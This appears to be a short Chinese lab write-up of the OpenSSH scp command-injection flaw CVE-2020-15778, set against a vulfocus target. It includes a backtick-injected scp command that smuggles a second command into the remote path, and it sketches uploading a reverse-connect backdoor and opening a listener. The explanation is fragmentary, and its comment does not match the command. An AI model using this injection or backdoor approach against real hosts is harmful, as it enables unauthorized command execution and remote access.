openssh 命令注入 (CVE-2020-15778)

描述:

OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。
OpenSSH的小于等于8.3p1版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。密码vulfocus:vulfocus

#意思是复制当前目录下的test.txt到目标的/tmp目录下,并且执行 touch /tmp/test.sh 的命令

scp / test.sh root@192.168.10.129:'`cat /tmp/test.sh`/tmp/test.sh'

没有使用小于8.3版本的openssh,只能进行文件上传和下载。也可以拿到后门

首先在本地编写好反联后门

Touch chengwenji.sh

Nano chengwenji.sh

使用scp进行上传

开启端口监听👂

这个条件比较苛刻,需要用户自己打开后门

相关推荐
马甲是掉不了一点的<.<7 小时前
本地电脑使用命令行上传文件至远程服务器
linux·scp·cmd·远程文件上传
命里有定数25 天前
Ubuntu问题 -- 使用scp将本机文件传输至ubuntu服务器中
linux·服务器·ubuntu·scp·文件传输
没刮胡子2 个月前
CentOS6升级OpenSSH9.2和OpenSSL3
linux·openssh·centos6·升级openssl
专业机床数据采集2 个月前
西门子网络程序传输,无需开通网络驱动器直接接入底层,支持各类数控 如发那科、三菱 、新代、海德汉、广数、精雕、马扎克等等
网络·scp·采集·程序传输·机床数据采集·西门子马扎克海德汉发那科·三菱新代凯恩帝牧野广州数控广数
橘色的喵3 个月前
Linux Shell: 使用 Expect 自动化 SCP 和 SSH 连接的 Shell 脚本详解
linux·ssh·scp·expect·远程·自动登录
查士丁尼·绵3 个月前
openssh8.6p1编译安装
openssh
LostSpeed4 个月前
debian12 - 修改SSH端口连接回包
openssh·debian12
caz284 个月前
scp命令的使用
scp
weixin_431697205 个月前
ubuntu2204升级openssh
ubuntu·openssh